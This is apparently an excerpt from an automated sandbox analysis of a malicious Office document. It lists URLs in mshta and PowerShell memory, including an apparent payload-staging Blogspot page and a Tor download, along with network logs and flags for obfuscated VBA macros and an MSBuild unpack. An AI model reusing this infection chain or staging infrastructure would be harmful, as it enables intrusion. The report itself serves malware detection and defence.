              Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/?tab=jj
              Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307809275.000000000588D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2308484243.0000000005919000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221567445.0000000003B49000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221525300.0000000005919000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://mainjigijigi123.blogspot.com/p/st2222.html%26
              Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2246403287.00000000058DC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264173240.00000000057E2000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221534508.000000000592E000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fmainjigijigi123.blogspot.com%2Fp%2Fst2222
              Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307809275.000000000588D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.html
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.html$
              Source: mshta.exe, 00000006.00000003.2245647822.0000000003AF4000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.html0E)
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.htmlH
              Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://mainjigijigi123.blogspot.com/p/st2222.htmlgspo
              Source: mshta.exe, 00000006.00000003.2241524951.000000000306E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=9116518222795791100&pageID=8792113328696570758
              Source: mshta.exe, 00000006.00000003.2251330504.0000000003472000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=9116518222795791100&pageID=8792113328696570758&blogs
              Source: mshta.exe, 00000006.00000002.2307809275.000000000588D000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=9116518222795791100&pageID=87921133286965707584.0E)
              Source: mshta.exe, 00000006.00000002.2307809275.000000000588D000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=9116518222795791100&pageID=8792113328696570758QV
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=9116518222795791100&zx=6c18238f-a
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2264656702.0000000005790000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2268752181.00000000003DE000.00000004.00000020.sdmpString found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=9116518222795791100&zx=6c18238f-a384-
              Source: mshta.exe, 00000006.00000003.2250723670.000000000341C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250960830.0000000003B3F000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/feeds/9116518222795791100/posts/default
              Source: mshta.exe, 00000006.00000003.2235127102.000000000340C000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/adspersonalization
              Source: mshta.exe, 00000006.00000003.2225510825.000000000347F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/blogspot-cookies
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/buzz
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/contentpolicy
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/devapi
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/devforum
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/discuss
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/helpcenter
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/privacy
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/terms
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/go/tutorials
              Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221525300.0000000005919000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.png
              Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pnga
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpString found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngcomment_from_post_iframe.jspng
              Source: mshta.exe, 00000006.00000003.2264609291.00000000057CD000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngmple/gradients_light.pngight.pngom%2Fp%2Fst2222.ht
              Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngv
              Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngx
              Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/page-edit.g?blogID=9116518222795791100&pageID=8792113328696570758&from=penci
              Source: mshta.exe, 00000006.00000003.2259640260.0000000003069000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpString found in binary or memory: https://www.blogger.com/rpc_relay.html
              Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=bl
              Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=em
              Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=fa
              Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=pi
              Source: mshta.exe, 00000006.00000003.2250626872.0000000005947000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=tw
              Source: mshta.exe, 00000006.00000003.2253117052.0000000002DF1000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2262558923.000000000012E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242550287.00000000075DE000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/2036001057-lbx__en_gb.js
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250247675.000000000044A000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js
              Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js.blogspot.com%2Fp%2Fst2222.
              Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsC:
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsT
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.jsn
              Source: mshta.exe, 00000006.00000003.2250247675.000000000044A000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/3767
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250960830.0000000003B3F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/376796862-ieretrofit.js
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/376796862-ieretrofit.js.cssmV
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.js
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.js06G
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpString found in binary or memory: https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.jsET4.0C;
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250219385.0000000000430000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.css
              Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.cssG
              Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/v-css/281434096-static_pages.cssjigi123.blogspot.com%2Fp%2Fst2222.
              Source: mshta.exe, 00000006.00000003.2253117052.0000000002DF1000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2262558923.000000000012E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242550287.00000000075DE000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/v-css/368954415-lightbox_bundle.css
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000002.2276548700.0000000003B43000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.css
              Source: mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.cssEV
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.cssQV
              Source: mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.csscV
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221495845.0000000005903000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221581590.0000000003B5D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250219385.0000000000430000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/widgets/84067855-widgets.js
              Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/widgets/84067855-widgets.jsY
              Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/static/v1/widgets/84067855-widgets.jseflate
              Source: mshta.exe, 00000006.00000003.2242751517.000000000018E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246295022.0000000005886000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/unvisited-link-
              Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
              Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com/
              Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
              Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.jsZ
              Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.jsal
              Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.jsttps%3A%2F%2Fmainjigijigi123.blogspot.com%2Fp%2Fst2222.
              Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmpString found in binary or memory: https://www.google-analytics.com/s
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
              Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/
              Source: mshta.exe, 00000006.00000003.2250647258.0000000005956000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/CO
              Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/css/maia.css
              Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/css/maia.cssM
              Source: mshta.exe, 00000006.00000002.2309877256.00000000080A2000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/css/maia.cssg
              Source: mshta.exe, 00000006.00000002.2268752181.00000000003DE000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/css/maia.cssgspotURL=https%3A%2F%2Fmainjigijigi123.blogspot.com%2Fp%2Fst2222.
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
              Source: mshta.exe, 00000006.00000003.2264675792.000000000585E000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_dark_clr_74x24px.svg
              Source: mshta.exe, 00000006.00000003.2264675792.000000000585E000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_light_clr_74x24px.svg
              Source: mshta.exe, 00000006.00000003.2264365340.0000000005775000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/gplus-32.png
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/gplus-32.png)
              Source: mshta.exe, 00000006.00000003.2261840668.00000000075DE000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/search_black_24dp.png
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.TCoB7ee77HA.O/rt=j/m=q_d
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.1KF06_f2niE.L.X.O/m=qawd
              Source: powershell.exe, 0000000C.00000002.2279587829.00000000046AE000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49204
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49200
              Source: unknownNetwork traffic detected: HTTP traffic on port 49183 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49188
              Source: unknownNetwork traffic detected: HTTP traffic on port 49181 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49184
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49183
              Source: unknownNetwork traffic detected: HTTP traffic on port 49200 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49181
              Source: unknownNetwork traffic detected: HTTP traffic on port 49204 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49206 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49195 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49193 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49210 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49184 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49215
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49213
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49210
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
              Source: unknownNetwork traffic detected: HTTP traffic on port 49190 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
              Source: unknownNetwork traffic detected: HTTP traffic on port 49188 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49195
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49193
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49192
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49190
              Source: unknownNetwork traffic detected: HTTP traffic on port 49208 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49192 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49213 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49208
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49206
              Source: unknownNetwork traffic detected: HTTP traffic on port 49215 -> 443
              Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49168 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49178 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49188 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49192 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49200 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49208 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49213 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 108.177.127.132:443 -> 192.168.2.22:49215 version: TLS 1.2
              Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS
              Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS
              Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS
              Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS
              Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS
              Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS
              Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS
              Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS
              Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS
              Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS

              System Summary:

              barindex
              .NET source code contains very large array initializationsShow sources
              Source: 29.2.MSBuild.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007bE0F986DBu002d41FAu002d48F8u002d8F63u002d63B8796C3D6Fu007d/u0030691DBC7u002d6A15u002d4BCCu002dB997u002d853341EE6FA4.csLarge array initialization: .cctor: array initializer size 12059
              Document contains an embedded VBA with base64 encoded stringsShow sources
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function nQedtxArQgZ, String zEROxKkkLThIdHgxYyJD
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function PvrrqugmtK, String zEROxKkkLThIdHgxYyJD
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function aaBJQySxVnzo, String zEROxKkkLThIdHgxYyJD
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function QAPwCVeTzuvty, String zEROxKkkLThIdHgxYyJD
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function QAPwCVeTzuvty, String MyORUMlOteZN
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function hHvsmECZuS, String zEROxKkkLThIdHgxYyJD
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function hHvsmECZuS, String MyORUMlOteZN
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function hHvsmECZuS, String SoqzJEixPkDxnScc
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function SADYAESdyLyl, String zEROxKkkLThIdHgxYyJD
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function SADYAESdyLyl, String MyORUMlOteZN
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function SADYAESdyLyl, String SoqzJEixPkDxnScc
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function SADYAESdyLyl, String umiuKavjsPKoqQrwEtZi
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function CHflsQkjzDFxQmeO, String zEROxKkkLThIdHgxYyJD
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function CHflsQkjzDFxQmeO, String MyORUMlOteZN
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function CHflsQkjzDFxQmeO, String SoqzJEixPkDxnScc
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function CHflsQkjzDFxQmeO, String umiuKavjsPKoqQrwEtZi
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function YqawgrxtEVk, String zEROxKkkLThIdHgxYyJD
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function YqawgrxtEVk, String MyORUMlOteZN
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function YqawgrxtEVk, String SoqzJEixPkDxnScc
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function YqawgrxtEVk, String umiuKavjsPKoqQrwEtZi
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function GhgwmphFjNLti, String zEROxKkkLThIdHgxYyJD
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function GhgwmphFjNLti, String MyORUMlOteZN
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function GhgwmphFjNLti, String SoqzJEixPkDxnScc
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function GhgwmphFjNLti, String umiuKavjsPKoqQrwEtZi
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function AKQMZpqLNQucEUBHbjY, String zEROxKkkLThIdHgxYyJD
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function AKQMZpqLNQucEUBHbjY, String MyORUMlOteZN
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function AKQMZpqLNQucEUBHbjY, String SoqzJEixPkDxnScc
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function AKQMZpqLNQucEUBHbjY, String umiuKavjsPKoqQrwEtZi
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function kVazolfxuRnLRNadrMO, String zEROxKkkLThIdHgxYyJD
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function kVazolfxuRnLRNadrMO, String MyORUMlOteZN
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function kVazolfxuRnLRNadrMO, String SoqzJEixPkDxnScc
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function kVazolfxuRnLRNadrMO, String umiuKavjsPKoqQrwEtZi
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function piRACQzERc, String zEROxKkkLThIdHgxYyJD
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function piRACQzERc, String MyORUMlOteZN
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function piRACQzERc, String SoqzJEixPkDxnScc
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function piRACQzERc, String umiuKavjsPKoqQrwEtZi
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function decrypt, String yqPfQprLotGR
